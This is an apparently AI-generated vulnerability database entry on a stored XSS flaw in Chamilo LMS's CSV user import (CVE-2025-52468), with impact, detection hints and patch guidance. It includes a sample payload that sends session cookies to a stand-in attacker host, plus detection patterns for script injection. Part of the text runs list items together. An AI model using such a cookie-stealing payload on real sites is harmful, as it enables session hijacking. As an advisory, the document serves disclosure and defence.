
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52468 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS affecting versions up to and including 1.11.28. The flaw exists in the CSV user import functionality, where insufficient sanitization of the "Last Name", "First Name", and "Username" fields allows attackers to inject persistent JavaScript payloads. The vulnerability was disclosed on March 2, 2026, and patched in version 1.11.30. It carries a CVSS v3.1 base score of 6.1 (Medium) per NVD, though the GitHub Security Advisory rates it 8.8 (High) (GitHub Advisory, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), classified as a stored XSS vulnerability. When an administrator imports users via CSV, the user_import.php file fails to sanitize the "Last Name", "First Name", and "Username" fields before storing them in the database. The injected payload is subsequently rendered unsanitized when any authenticated user views the compromised user profile, executing arbitrary JavaScript in the victim's browser session. Additionally, unauthenticated users can trigger the payload via the "Who is Online" page (whoisonline.php) when a malicious user is active. The fix, applied in commit 790ef51, adds XSS removal logic during the user import process (GitHub Advisory, Patch Commit).
Successful exploitation enables persistent JavaScript execution in the context of any authenticated user who views a compromised profile, enabling session hijacking, credential theft, and unauthorized actions performed on behalf of the victim. Both authenticated and unauthenticated users are at risk — unauthenticated attackers can trigger the payload via the public "Who is Online" page. In a worst-case scenario, if an administrator views the malicious profile, the attacker could escalate privileges or perform administrative actions within the LMS (GitHub Advisory).
A proof-of-concept is referenced in the GitHub Security Advisory, and no evidence of active in-the-wild exploitation has been reported as of the disclosure date. The attack requires no authentication to plant the payload (assuming access to the CSV import feature, which typically requires admin privileges) but can be triggered by unauthenticated users via the "Who is Online" page. The EPSS score is approximately 0.045% (very low probability of near-term exploitation). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog (GitHub Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.whoisonline.php page, which triggers the stored payload in the victim's browser.whoisonline.php page; unusual GET/POST requests to attacker-controlled URLs containing encoded cookie or session data.whoisonline.php or user profile pages followed by requests to external domains; application logs recording CSV imports with unusual characters (<, >, script) in name or username fields.firstname, lastname, or username fields contain HTML tags or JavaScript code (e.g., <script>, onerror=, javascript:) (GitHub Advisory).Upgrade Chamilo LMS to version 1.11.30 or later, which applies XSS sanitization during the CSV user import process (Chamilo Release, Patch Commit). As interim mitigations: restrict CSV user import access to highly trusted administrators only; implement Content Security Policy (CSP) headers to limit script execution to trusted origins; and audit existing user records for suspicious content in name and username fields. Organizations should also review recent CSV import history for any entries containing HTML or JavaScript characters.
The vulnerability was reported by researcher NaklehZeidan21 and remediated by developer AngelFQC, as credited in the GitHub Security Advisory. Coverage appeared on The Hacker Wire and was tracked by standard vulnerability aggregators including Vulners and CVEFeed. No significant broader media coverage or notable researcher commentary beyond the advisory has been identified (GitHub Advisory, The Hacker Wire).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."